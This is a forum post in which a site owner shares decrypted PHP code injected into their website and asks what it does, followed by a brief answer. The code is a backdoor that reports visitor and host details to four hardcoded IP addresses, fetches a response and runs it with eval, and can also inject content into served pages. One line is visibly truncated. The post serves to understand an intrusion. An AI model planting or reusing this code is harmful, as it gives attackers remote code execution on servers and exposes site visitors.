This was injected into my site in a hack attack the other day, I decrypted it and got this:
Can someone tell me what it does?
EDIT: dont go to the IP addresses, They are probably malicious too.
if (!function_exists(GetMama)){
function opanki($buf){
global $god_mode;
str_replace("href","href",strtolower($buf),$cnt_h);
str_replace(" 2)&&($cnt_x == 0)) {
$buf = $god_mode . $buf;
} return $buf;
}
function GetMama(){
$mother = "www.imp3.me";
return $mother;
}
ob_start("opanki");
$show = false;
function ahfudflfzdhfhs($pa){
global $show;
global $god_mode;
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;
if( function_exists("curl_init") ){
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = curl_exec($ch);
} else {
$ult = @file_get_contents($url);
}
if (strpos($ult,"eval") !== false){
$z = str_replace("eval","",$ult);
eval($z);
$show = true;
return true;
}
if (strpos($ult,"ebna") !== false){
$z = str_replace("ebna","",$ult);
$god_mode = $z;
$show = true;
return true;
} else {
return false;
}
}
$father[] = "146.185.254.245";
$father[] = "31.184.242.103";
$father[] = "91.196.216.148";
$father[] = "91.196.216.49";
foreach($father as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
if ($show === false){
$script='';
$god_mode = $script;
}
}
It fetches (
file_get_contents) a file from the IP addresses listed and executes (eval) the file, which can be anything. Putting more files on your server, looking for other vulnerabilities, sending spam e-mails, hosting malware .. anything.